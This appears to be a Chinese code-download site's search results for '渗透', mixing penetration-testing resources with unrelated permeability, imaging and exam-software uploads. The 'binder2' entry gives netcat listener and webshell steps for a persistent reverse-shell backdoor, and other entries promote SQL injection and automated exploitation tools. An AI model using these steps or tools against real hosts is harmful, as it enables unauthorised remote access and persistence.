搜索资源列表
组合加密软件包 Lock Manage 5
- Lock Manage 是一个功能比较全面的加密软件。 它具有多种加密方案:如文件口令加密,文件反拷贝加密,软硬盘加密,安装加密,文本加密,批处理加密等等。系统是由C和汇编写成,可从外部链接于主模块。可单独编译,单独调试。可执行EXE/COM程序加密模块已经过长时间的测试分析,其工作性能己十分稳定。可移植性与兼容性很好。另外,代码实现了CS,DS不换技术,使其SHELL性能难以被DEBUG识别。其内部密码采用单向不可逆变换,基本实现了不可解,原因在于四个随机密钥只能用穷举法找出。这种可靠原四密钥
数字图像几何变换
- 几何变换是最常见的图像处理手段,通过对变形的图像进行几何校正,可以得出准确的图像。常用的几何变换功能包括图像的平移、图像的镜像变换、图像的转置、图像的缩放、图像的旋转等等。目前数字图像处理的应用越来越广泛,已经渗透到工业、航空航天、军事等各个领域,在国民经济中发挥越来越大的作用。 作为数字图像处理的一个重要部分,本文介绍的工作是如何用Visual C++编程工具设计一个完整的应用程序,实现经典的图像几何变换功能。程序大概分为两大部分:读写BMP图像,和数字图像的几何变换。即首先用Visual
binder2
- 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参
MatlabandVB
- 第一章 概述 辨识(Identification)、状态估计和控制理论在现代控制理论中是密不可分的,它们互相渗透。辨识和状态估计离不开控制理论的支持,控制理论的应用几乎不能没有辨识和估计技术。由此可见,辨识在科研与实际应用领域都有很高的实用价值。 所谓辨识,就是从含有噪声的输入、输出数据中提取被研究对象的数据模型。此数据模型只是过程的输入输出特性在某种意义下的近似,而近似的准确度一般取决于采样数据的精度以及辨识方法的合理性。 辨识的目的是根据过程所提供测量的数据等信息,在某种准则意
quizaspcode
- 网上考试系统 随着社会的发展,网络无处不在,它渗透进我们生活的方方面面,包括考试在内。这个网上考试系统有外国友人设计,采用选择题方式进行,最后给出综合评价。 -online examination system along with the development of society, everywhere in the network, which infiltrated every aspect of our lives. Examinations, including. The on
是一个渗透测试的系统,类似于Linux
- 是一个渗透测试的系统,类似于Linux,功能很强大,很实用,我也是刚刚装机的-Is a penetration test system, similar to Linux, very powerful, very practical, I have just installed the
《网络渗透技术》随书所附源代码
- 《网络渗透技术》一书所附源代码,可在网络上公开取得,没有版权问题。-err
networkSimAttack
- windows平台下网络渗透测试的初步实现,需要进一步开发-under windows platform for network penetration testing preliminary realize the need for further development
Metasploit渗透测试指南(中文完整清晰版)
- 对初学web安全,编程测试,是一个不错的学习资料。(For beginners web security, programming testing, is a good learning materials.)
穿山甲
- sql注入工具,历史上最好用的渗透攻击工具,没有之一,强烈推荐使用。(The best penetration in the history of the tools, there is no one, strongly recommended.)
Kali Linux渗透测试技术详解
- kali 渗透书籍 很不错的文档,希望可以帮到大家(Kali infiltration books, very good documentation)
kali_linux渗透测试资料
- 学习文件,关于kali-linux渗透的配置信息等(learning kali linux info)
PTES_MindMap_CN1
- 渗透测试指导说明,适合初学者渗透测试时参考,此文件为一个思维导图。(Penetration test instructions, suitable for beginners to penetrate the test reference, this document is a mind map.)
Black Hat Python
- 本书由 Immunity 公司的高级安全研究员 Justin Seitz 精心撰写。作者根据自己在安全界,特别是渗透测试领域的几十年经验,向读者介绍了 Python 如何被用在黑客和渗透测试的各个领域,从基本的网络扫描到数据包捕获,从 Web 爬虫到编写 Burp 扩展工具,从编写木马到权限提升等。(The book is written by Justin Seitz, a senior security researcher at Immunity company. Based on his
暗战亮剑++黑客渗透与防御全程实录_
- 黑客渗透与防御全程实录,比较全的黑客学习资料。(Hacker penetration and defense throughout the record, compare the entire hacker learning materials.)
渗透工具
- 很实用的渗透工具,非常强大,本人精心挑选的,大家可以使用看看(this is very useful very useful)
black spider 密码:1452
- black spider自动化渗透工具,爆破,子域名,EXP漏洞利用,C段,旁站都有了/(Black spider automated penetration tool, blasting, sub domain name, EXP vulnerability, C segment, stand by.)
production-injection-permeability in ABAQUS
- 能够实现ABAQUS注采建模,并且利用子程序实现注采过程中的渗透率应力敏感性描述(ABAQUS injection-production modeling can be realized, and the permeability stress sensitivity descr iption in injection-production process can be realized by subroutine.)
附录3:拟合渗透椭圆
- 可用于裂隙岩体渗流数值模拟分析中,通过该代码拟合渗透椭圆。(It can be used for seepage of fractured rock mass and fitting the penetration ellipse.)
LBM
- 实现圆柱扰流仿真,模拟通道压裂的压裂液流动,分析导流能力及支撑柱的渗透率(Cylinder turbulence simulation is implemented to simulate the flow of fracturing fluid in channel fracturing and analyze the conductivity and permeability of the support column)